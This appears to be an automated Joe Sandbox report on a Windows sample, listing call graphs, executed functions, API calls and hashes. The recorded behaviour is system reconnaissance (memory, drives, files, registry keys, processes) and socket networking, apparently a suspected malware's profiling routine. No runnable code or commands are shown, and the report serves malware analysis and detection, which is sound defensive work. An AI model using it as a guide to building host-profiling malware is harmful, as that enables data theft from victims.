GetLogicalDrives 65603->65604 65605 713047f GetLogicalDrives 65604->65605 65607 7130528 65605->65607 65609 713021d 65608->65609 65610 7130446 2 API calls 65609->65610 65611 713043a 65609->65611 65610->65609 65612 7130492 GetLogicalDrives 65611->65612 65613 713047f GetLogicalDrives 65612->65613 65615 7130528 65613->65615 65617 713049f GetLogicalDrives 65616->65617 65619 7130528 65617->65619 65620 3f2f17 65627 3f2f2c 65620->65627 65621 3f31d3 65622 3f2fb3 RegOpenKeyExA 65622->65627 65623 3f315c RegEnumKeyExA 65623->65627 65624 3f3046 RegOpenKeyExA 65625 3f3089 RegQueryValueExA 65624->65625 65624->65627 65626 3f313b RegCloseKey 65625->65626 65625->65627 65626->65627 65627->65621 65627->65622 65627->65623 65627->65624 65627->65626 65628 3f31d7 65631 3f31f4 65628->65631 65629 3f3200 65630 3f32dc CloseHandle 65630->65629 65631->65629 65631->65630 65128 4a3c00 65129 4a3c23 65128->65129 65130 4a3c0d 65128->65130 65129->65130 65132 4bb180 65129->65132 65135 4bb19b 65132->65135 65139 4bb2e3 65132->65139 65136 4bb2a9 getsockname 65135->65136 65138 4bb020 closesocket 65135->65138 65135->65139 65140 4baf30 65135->65140 65144 4bb060 65135->65144 65149 4bb020 65136->65149 65138->65135 65139->65130 65141 4baf4c 65140->65141 65142 4baf63 socket 65140->65142 65141->65142 65143 4baf52 65141->65143 65142->65135 65143->65135 65145 4bb080 65144->65145 65146 4bb0b0 connect 65145->65146 65147 4bb0bf WSAGetLastError 65145->65147 65148 4bb0ea 65145->65148 65146->65147 65147->65145 65147->65148 65148->65135 65150 4bb052 65149->65150 65152 4bb029 65149->65152 65150->65135 65151 4bb04b closesocket 65151->65150 65152->65151 65153 4bb03e 65152->65153 65153->65135 65632 4a4720 65636 4a4728 65632->65636 65633 4a4733 65635 4a4774 65636->65633 65643 4a476c 65636->65643 65644 4a5540 socket ioctlsocket connect getsockname closesocket 65636->65644 65638 4a482e 65638->65643 65645 4a9270 65638->65645 65640 4a4860 65650 4a4950 65640->65650 65642 4a4878 65643->65642 65656 4a30a0 socket ioctlsocket connect getsockname closesocket 65643->65656 65644->65638 65657 4aa440 65645->65657 65647 4a9297 65649 4a92ab 65647->65649 65685 4abbe0 socket ioctlsocket connect getsockname closesocket 65647->65685 65649->65640 65653 4a4966 65650->65653 65651 4a4aa0 gethostname 65652 4a49c5 65651->65652 65655 4a49b9 65651->65655 65652->65643 65653->65652 65653->65655 65686 4abbe0 socket ioctlsocket connect getsockname closesocket 65653->65686 65655->65651 65655->65652 65656->65635 65683 4aa46b 65657->65683 65658 4aaa03 RegOpenKeyExA 65659 4aab70 RegOpenKeyExA 65658->65659 65660 4aaa27 RegQueryValueExA 65658->65660 65663 4aac34 RegOpenKeyExA 65659->65663 65680 4aab90 65659->65680 65661 4aaacc RegQueryValueExA 65660->65661 65662 4aaa71 65660->65662 65665 4aab0e 65661->65665 65666 4aab66 RegCloseKey 65661->65666 65662->65661 65668 4aaa85 RegQueryValueExA 65662->65668 65664 4aacf8 RegOpenKeyExA 65663->65664 65682 4aac54 65663->65682 65667 4aad56 RegEnumKeyExA 65664->65667 65670 4aad14 65664->65670 65665->65666 65673 4aab1e RegQueryValueExA 65665->65673 65666->65659 65669 4aad9b 65667->65669 65667->65670 65672 4aaab3 65668->65672 65671 4aae16 RegOpenKeyExA 65669->65671 65670->65647 65674 4aaddf RegEnumKeyExA 65671->65674 65675 4aae34 RegQueryValueExA 65671->65675 65672->65661 65676 4aab4c 65673->65676 65674->65670 65674->65671 65677 4aaf43 RegQueryValueExA 65675->65677 65684 4aadaa 65675->65684 65676->65666 65678 4ab052 RegQueryValueExA 65677->65678 65677->65684 65679 4aadc7 RegCloseKey 65678->65679 65678->65684 65679->65674 65680->65663 65681 4aafa0 RegQueryValueExA 65681->65684 65682->65664 65683->65658 65683->65670 65684->65677 65684->65678 65684->65679 65684->65681 65685->65649 65686->65655 65154 4ba080 65157 4b9740 65154->65157 65156 4ba09b 65158 4b9780 65157->65158 65162 4b975d 65157->65162 65159 4b9925 RegOpenKeyExA 65158->65159 65158->65162 65160 4b995a RegQueryValueExA 65159->65160 65159->65162 65161 4b9986 RegCloseKey 65160->65161 65161->65162 65162->65156 65163 3ff7b0 65164 3ff97a 65163->65164 65165 3ff7c3 65163->65165 65165->65164 65166 3ff932 65165->65166 65186 3ffec0 7 API calls 65165->65186 65171 42cd80 65166->65171 65168 3ff942 65170 3ff9bb WSACloseEvent 65168->65170 65170->65164 65172 42d0e5 65171->65172 65177 42cd9a 65171->65177 65172->65168 65173 42d0b4 65196 40f6c0 7 API calls 65173->65196 65177->65172 65184 42ce6b 65177->65184 65187 42dc30 socket ioctlsocket connect getsockname closesocket 65177->65187 65178 42d064 65178->65173 65195 42de00 socket ioctlsocket connect getsockname closesocket 65178->65195 65182 42d016 65182->65178 65194 42de00 socket ioctlsocket connect getsockname closesocket 65182->65194 65183 42cf4b 65183->65182 65189 42e130 socket ioctlsocket connect getsockname closesocket 65183->65189 65190 406fa0 65183->65190 65184->65178 65184->65183 65188 42dc30 socket ioctlsocket connect getsockname closesocket 65184->65188 65186->65165 65187->65177 65188->65184 65189->65183 65191 406fd4 65190->65191 65193 406feb 65190->65193 65192 407207 select 65191->65192 65191->65193 65192->65193 65193->65183 65194->65182 65195->65178 65196->65172 65197 428b50 65198 428b6b 65197->65198 65215 428bb5 65197->65215 65199 428bf3 65198->65199 65200 428b8f 65198->65200 65198->65215 65217 42a550 65199->65217 65236 406e40 select 65200->65236 65203 428cd9 SleepEx getsockopt 65205 428d18 65203->65205 65204 428bfc 65207 428c35 65204->65207 65208 428c1f connect 65204->65208 65212 428cb2 65204->65212 65204->65215 65209 428d43 65205->65209 65205->65212 65206 42a150 getsockname 65214 428dff 65206->65214 65232 42a150 65207->65232 65208->65207 65213 42a150 getsockname 65209->65213 65212->65206 65212->65214 65212->65215 65213->65215 65214->65215 65237 3f78b0 closesocket 65214->65237 65216 428ba1 65216->65203 65216->65212 65216->65215 65218 42a575 65217->65218 65223 42a597 65218->65223 65239 3f75e0 65218->65239 65220 3f78b0 closesocket 65222 42a713 65220->65222 65221 42a811 setsockopt 65228 42a83b 65221->65228 65222->65204 65223->65221 65223->65228 65230 42a69b 65223->65230 65225 42af56 65226 42af5d 65225->65226 65225->65230 65226->65222 65227 42a150 getsockname 65226->65227 65227->65222 65228->65230 65231 42abe1 65228->65231 65245 426be0 8 API calls 65228->65245 65230->65220 65230->65222 65231->65230 65244 4567e0 ioctlsocket 65231->65244 65233 42a15f 65232->65233 65235 42a1d0 65232->65235 65234 42a181 getsockname 65233->65234 65233->65235 65234->65235 65235->65216 65236->65216 65238 3f78c5 65237->65238 65238->65215 65240 3f75ef 65239->65240 65241 3f7607 socket 65239->65241 65240->65241 65243 3f7643 65240->65243 65242 3f762b 65241->65242 65242->65223 65243->65223 65244->65225 65245->65231 65687 4295b0 65688 4295c8 65687->65688 65690 4295fd 65687->65690 65689 42a150 getsockname 65688->65689 65688->65690 65689->65690 65691 426ab0 65692 426ad5 65691->65692 65693 426bb4 65692->65693 65695 406fa0 select 65692->65695 65694 4a5ed0 7 API calls 65693->65694 65697 426ba9 65694->65697 65696 426b54 65695->65696 65696->65693 65696->65697 65698 426b5d 65696->65698 65698->65697 65700 4a5ed0 65698->65700 65703 4a5a50 65700->65703 65702 4a5ee5 65702->65698 65704 4a5ea0 65703->65704 65705 4a5a58 65703->65705 65704->65702 65708 4a5b50 65705->65708 65712 4a5b88 65705->65712 65717 4a5a99 65705->65717 65706 4a5e96 65736 4b9480 socket ioctlsocket connect getsockname closesocket 65706->65736 65709 4a5b7a 65708->65709 65710 4a5eb4 65708->65710 65708->65712 65726 4a70a0 65709->65726 65737 4a6f10 socket ioctlsocket connect getsockname closesocket 65710->65737 65720 4a5cae 65712->65720 65734 4a5ef0 socket ioctlsocket connect getsockname 65712->65734 65714 4a5ec2 65714->65714 65717->65712 65718 4a70a0 6 API calls 65717->65718 65733 4a6f10 socket ioctlsocket connect getsockname closesocket 65717->65733 65718->65717 65720->65706 65722 4ba920 65720->65722 65735 4b9320 socket ioctlsocket connect getsockname closesocket 65720->65735 65723 4ba944 65722->65723 65724 4ba94b 65723->65724 65725 4ba977 send 65723->65725 65724->65720 65725->65720 65727 4a70ae 65726->65727 65729 4a71a7 65727->65729 65730 4a717f 65727->65730 65738 4ba8c0 65727->65738 65742 4a71c0 socket ioctlsocket connect getsockname 65727->65742 65729->65712 65730->65729 65743 4b9320 socket ioctlsocket connect getsockname closesocket 65730->65743 65733->65717 65734->65712 65735->65720 65736->65704 65737->65714 65739 4ba903 recvfrom 65738->65739 65740 4ba8e6 65738->65740 65741 4ba8ed 65739->65741 65740->65739 65740->65741 65741->65727 65742->65727 65743->65729 65744 3f13c9 65747 3f1160 65744->65747 65746 3f13a1 65747->65746 65748 778a20 isxdigit 65747->65748 65748->65747 65749 877830 65751 87785a 65749->65751 65750 877866 65751->65750 65754 7812c0 65751->65754 65753 87789a 65755 7812cc 65754->65755 65758 77e050 65755->65758 65757 7812fa 65757->65753 65759 77e09d 65758->65759 65760 77feb6 isxdigit 65759->65760 65761 77e18e 65759->65761 65760->65759 65761->65757 65762 401139 65763 401148 65762->65763 65765 401527 65763->65765 65768 400f00 65763->65768 65770 3ffec0 7 API calls 65763->65770 65765->65768 65771 4022d0 7 API calls 65765->65771 65767 400f7b 65768->65767 65772 42d4d0 socket ioctlsocket connect getsockname closesocket 65768->65772 65770->65765 65771->65768 65772->65768 65246 717040d 65247 7170386 65246->65247 65249 71703dc 65246->65249 65248 71703ab Process32FirstW 65247->65248 65247->65249 65248->65249

                                                              Executed Functions

                                                              Function 003F255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 509 3f255d-3f2614 call 779f70 GetSystemInfo call 879af0 call 879ce0 GlobalMemoryStatusEx call 879af0 call 879ce0 591 3f2619 call 7130492 509->591 592 3f2619 call 71300d1 509->592 593 3f2619 call 7130215 509->593 594 3f2619 call 7130454 509->594 595 3f2619 call 713001b 509->595 596 3f2619 call 713049a 509->596 597 3f2619 call 713029a 509->597 598 3f2619 call 713015a 509->598 599 3f2619 call 713005a 509->599 600 3f2619 call 7130518 509->600 601 3f2619 call 713011f 509->601 602 3f2619 call 7130342 509->602 603 3f2619 call 7130501 509->603 604 3f2619 call 7130000 509->604 605 3f2619 call 7130080 509->605 606 3f2619 call 7130446 509->606 607 3f2619 call 7130046 509->607 608 3f2619 call 71300c4 509->608 609 3f2619 call 713038b 509->609 610 3f2619 call 713040a 509->610 611 3f2619 call 713030a 509->611 612 3f2619 call 7130009 509->612 613 3f2619 call 71304cd 509->613 614 3f2619 call 71302cd 509->614 615 3f2619 call 71302b2 509->615 616 3f2619 call 71301bb 509->616 617 3f2619 call 713013a 509->617 618 3f2619 call 71301fa 509->618 619 3f2619 call 713017d 509->619 620 3f2619 call 71303a3 509->620 621 3f2619 call 7130321 509->621 622 3f2619 call 7130261 509->622 623 3f2619 call 7130466 509->623 624 3f2619 call 7130226 509->624 625 3f2619 call 713032a 509->625 626 3f2619 call 71300aa 509->626 627 3f2619 call 713036f 509->627 628 3f2619 call 71301ee 509->628 629 3f2619 call 71303ec 509->629 630 3f2619 call 71300ec 509->630 520 3f261b-3f2620 521 3f277c-3f2904 call 879af0 call 879ce0 KiUserCallbackDispatcher call 879af0 call 879ce0 call 879af0 call 879ce0 call 778e38 call 778be0 call 778bd0 FindFirstFileW 520->521 522 3f2626-3f2637 call 8798f0 520->522 569 3f2928-3f292c 521->569 570 3f2906-3f2926 FindNextFileW 521->570 526 3f2754-3f275c 522->526 529 3f263c-3f264f GetDriveTypeA 526->529 530 3f2762-3f2777 call 879ce0 526->530 532 3f2655-3f2685 GetDiskFreeSpaceExA 529->532 533 3f2743-3f2751 call 778b98 529->533 530->521 532->533 536 3f268b-3f273e call 879bc0 call 879c50 call 879ce0 call 8799e0 call 879ce0 call 8799e0 call 879ce0 call 878050 532->536 533->526 536->533 571 3f292e 569->571 572 3f2932-3f296f call 879af0 call 879ce0 call 778e78 569->572 570->569 570->570 571->572 578 3f2974-3f2979 572->578 579 3f297b-3f29a4 call 879af0 call 879ce0 578->579 580 3f29a9-3f29fe call 77a2b0 call 879af0 call 879ce0 578->580 579->580 591->520 592->520 593->520 594->520 595->520 596->520 597->520 598->520 599->520 600->520 601->520 602->520 603->520 604->520 605->520 606->520 607->520 608->520 609->520 610->520 611->520 612->520 613->520 614->520 615->520 616->520 617->520 618->520 619->520 620->520 621->520 622->520 623->520 624->520 625->520 626->520 627->520 628->520 629->520 630->520
                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 003F2579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 003F25CC
                                                              • GetDriveTypeA.KERNELBASE ref: 003F2647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 003F267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 003F27E2
                                                              • FindFirstFileW.KERNELBASE ref: 003F28F8
                                                              • FindNextFileW.KERNELBASE ref: 003F291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: ;%?$@$`
                                                              • API String ID: 3271271169-2834044027
                                                              • Opcode ID: 2f611a7836701ba3adab9df5bf9a4ab45598340f5aeb6f60f67b38c1ba231e6a
                                                              • Instruction ID: b00315104fbff818d2f57cfcff91b449c8192f5c4a17444339d56aea33dd5e3a
                                                              • Opcode Fuzzy Hash: 2f611a7836701ba3adab9df5bf9a4ab45598340f5aeb6f60f67b38c1ba231e6a
                                                              • Instruction Fuzzy Hash: 48D1C3B49093189FCB50EFA8C59569EBBF0FF84340F018969E898D7315E7749A84CF92
                                                              Function 003F29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1052 3f29ff-3f2a2f FindFirstFileA 1053 3f2a38 1052->1053 1054 3f2a31-3f2a36 1052->1054 1055 3f2a3d-3f2a91 call 879c50 call 879ce0 RegOpenKeyExA 1053->1055 1054->1055 1060 3f2a9a 1055->1060 1061 3f2a93-3f2a98 1055->1061 1062 3f2a9f-3f2b0c call 879c50 call 879ce0 CharUpperA call 778da0 1060->1062 1061->1062 1070 3f2b0e-3f2b13 1062->1070 1071 3f2b15 1062->1071 1072 3f2b1a-3f2b92 call 879c50 call 879ce0 call 778e80 call 778e70 1070->1072 1071->1072 1081 3f2bcc-3f2c66 QueryFullProcessImageNameA CloseHandle call 778da0 1072->1081 1082 3f2b94-3f2ba3 1072->1082 1092 3f2c6f 1081->1092 1093 3f2c68-3f2c6d 1081->1093 1085 3f2ba5-3f2bae 1082->1085 1086 3f2bb0-3f2bc0 call 778e68 1082->1086 1085->1081 1090 3f2bc5-3f2bca 1086->1090 1090->1081 1090->1082 1094 3f2c74-3f2ce9 call 879c50 call 879ce0 call 778e80 call 778e70 1092->1094 1093->1094 1103 3f2dcf-3f2e1c call 879c50 call 879ce0 CloseHandle 1094->1103 1104 3f2cef-3f2d49 call 778bb0 call 778da0 1094->1104 1114 3f2e23-3f2e2e 1103->1114 1115 3f2d4b-3f2d63 call 778da0 1104->1115 1116 3f2d99-3f2dad 1104->1116 1117 3f2e37 1114->1117 1118 3f2e30-3f2e35 1114->1118 1115->1116 1125 3f2d65-3f2d7d call 778da0 1115->1125 1116->1103 1120 3f2e3c-3f2ed6 call 879c50 call 879ce0 1117->1120 1118->1120 1133 3f2eea 1120->1133 1134 3f2ed8-3f2ee1 1120->1134 1125->1116 1130 3f2d7f-3f2d97 call 778da0 1125->1130 1130->1116 1138 3f2daf-3f2dc9 call 778e68 1130->1138 1137 3f2eef-3f2f16 call 879c50 call 879ce0 1133->1137 1134->1133 1136 3f2ee3-3f2ee8 1134->1136 1136->1137 1138->1103 1138->1104
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: 5cf6841dfaa497d4b11c1610d5abe77903bfb9f1ba781d11b55639d33bd773aa
                                                              • Instruction ID: 8497c437cdad18f05cefaa66dd42549399d2acae0f28a668c99732887d324d88
                                                              • Opcode Fuzzy Hash: 5cf6841dfaa497d4b11c1610d5abe77903bfb9f1ba781d11b55639d33bd773aa
                                                              • Instruction Fuzzy Hash: 73E1E5B4908309DFCB50EF68D995A9EBBF4AF48344F118869E898DB350E774D944CF42
                                                              Function 004005B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1198 4005b0-4005b7 1199 4005bd-4005d4 1198->1199 1200 4007ee 1198->1200 1201 4007e7-4007ed 1199->1201 1202 4005da-4005e6 1199->1202 1201->1200 1202->1201 1203 4005ec-4005f0 1202->1203 1204 4005f6-400620 call 407350 call 3f70b0 1203->1204 1205 4007c7-4007cc 1203->1205 1210 400622-400624 1204->1210 1211 40066a-40068c call 42dec0 1204->1211 1205->1201 1213 400630-400655 call 3f70d0 call 4003c0 call 407450 1210->1213 1216 400692-4006a0 1211->1216 1217 4007d6-4007e3 call 407380 1211->1217 1242 40065b-400668 call 3f70e0 1213->1242 1243 4007ce 1213->1243 1219 4006a2-4006a4 1216->1219 1220 4006f4-4006f6 1216->1220 1217->1201 1223 4006b0-4006e4 call 4073b0 1219->1223 1225 4006fc-4006fe 1220->1225 1226 4007ef-40082b call 403000 1220->1226 1223->1217 1241 4006ea-4006ee 1223->1241 1231 40072c-400754 1225->1231 1239 400831-400837 1226->1239 1240 400a2f-400a35 1226->1240 1232 400756-40075b 1231->1232 1233 40075f-40078b 1231->1233 1237 400707-400719 WSAEventSelect 1232->1237 1238 40075d 1232->1238 1253 400700-400703 1233->1253 1254 400791-400796 1233->1254 1237->1217 1251 40071f 1237->1251 1244 400723-400726 1238->1244 1246 400861-40087e 1239->1246 1247 400839-40084c call 406fa0 1239->1247 1249 400a37-400a3a 1240->1249 1250 400a3c-400a52 1240->1250 1241->1223 1248 4006f0 1241->1248 1242->1211 1242->1213 1243->1217 1244->1226 1244->1231 1266 400882-40088d 1246->1266 1264 400852 1247->1264 1265 400a9c-400aa4 1247->1265 1248->1220 1249->1250 1250->1217 1256 400a58-400a81 call 402f10 1250->1256 1251->1244 1253->1237 1254->1253 1258 40079c-4007c2 call 3f76a0 1254->1258 1256->1217 1267 400a87-400a97 call 406df0 1256->1267 1258->1253 1264->1246 1269 400854-40085f 1264->1269 1265->1217 1270 400970-400975 1266->1270 1271 400893-4008b1 1266->1271 1267->1217 1269->1266 1273 400a19-400a2c 1270->1273 1274 40097b-400989 call 3f70b0 1270->1274 1275 4008c8-4008f7 1271->1275 1273->1240 1274->1273 1283 40098f-40099e 1274->1283 1281 4008f9-4008fb 1275->1281 1282 4008fd-400925 1275->1282 1284 400928-40093f 1281->1284 1282->1284 1285 4009b0-4009c1 call 3f70d0 1283->1285 1291 4008b3-4008c2 1284->1291 1292 400945-40096b 1284->1292 1289 4009a0-4009ae call 3f70e0 1285->1289 1290 4009c3-4009c7 1285->1290 1289->1273 1289->1285 1293 4009e8-400a03 WSAEnumNetworkEvents 1290->1293 1291->1270 1291->1275 1292->1291 1296 4009d0-4009e6 WSAEventSelect 1293->1296 1297 400a05-400a17 1293->1297 1296->1289 1296->1293 1297->1296
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,?,?), ref: 00400711
                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 004009DC
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004009FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: N=?$multi.c
                                                              • API String ID: 2170980988-1873493139
                                                              • Opcode ID: 472e12622852dc0383a348890efbfb13c205e2bd9e4688a0723b4e9962c1aadb
                                                              • Instruction ID: 41602487361ef7d2c1578efdbf4f0f2b4a0ce777a242fc83ed3ad8db1e1d0dbb
                                                              • Opcode Fuzzy Hash: 472e12622852dc0383a348890efbfb13c205e2bd9e4688a0723b4e9962c1aadb
                                                              • Instruction Fuzzy Hash: EBD1CF716083019FE711DF64C881B6BB7E5BF94348F04483EF985A7282E778E945CB56
                                                              Function 003F7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1332 3f7770-3f778e 1333 3f77b6-3f77c2 recv 1332->1333 1334 3f7790-3f7797 1332->1334 1336 3f782e-3f7832 1333->1336 1337 3f77c4-3f77d9 call 3f72a0 1333->1337 1334->1333 1335 3f7799-3f77a1 1334->1335 1338 3f77db-3f7829 call 3f72a0 call 3fcb20 call 778c50 1335->1338 1339 3f77a3-3f77b4 1335->1339 1337->1336 1338->1336 1339->1337
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: b6be15e46d3c8c92ceb3168669c0d6417f45ad9e0ddf1b2d0843fb258fac5eff
                                                              • Instruction ID: 24b40fa7c9d9ff654475c546f3535e2712e2370b59fd4d8195b725150409ea29
                                                              • Opcode Fuzzy Hash: b6be15e46d3c8c92ceb3168669c0d6417f45ad9e0ddf1b2d0843fb258fac5eff
